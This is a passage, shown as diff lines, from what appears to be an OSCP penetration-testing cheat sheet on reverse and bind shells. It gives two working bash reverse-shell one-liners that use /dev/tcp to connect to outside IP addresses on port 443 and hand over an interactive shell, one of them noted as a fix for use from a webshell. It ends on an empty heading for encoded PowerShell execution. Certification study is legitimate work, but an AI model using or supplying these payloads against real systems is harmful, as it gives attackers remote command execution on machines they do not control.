jonnyzar/OSCP_CheatSheets/reverse_bind_shells_cheatsheet.md

 this one works everywhere `exec 5<>/dev/tcp/10.10.14.151/443;cat <&5 | while read line; do $line 2>&5 >&5; done`

+### Bash wrapper

+sometimes bash fails especially from webshell, so it can be wrapped to fix it

+`bash -c "bash -i >& /dev/tcp/192.168.45.176/443 0>&1"`

 ## Powershell

 ### Encoded Powershell Execution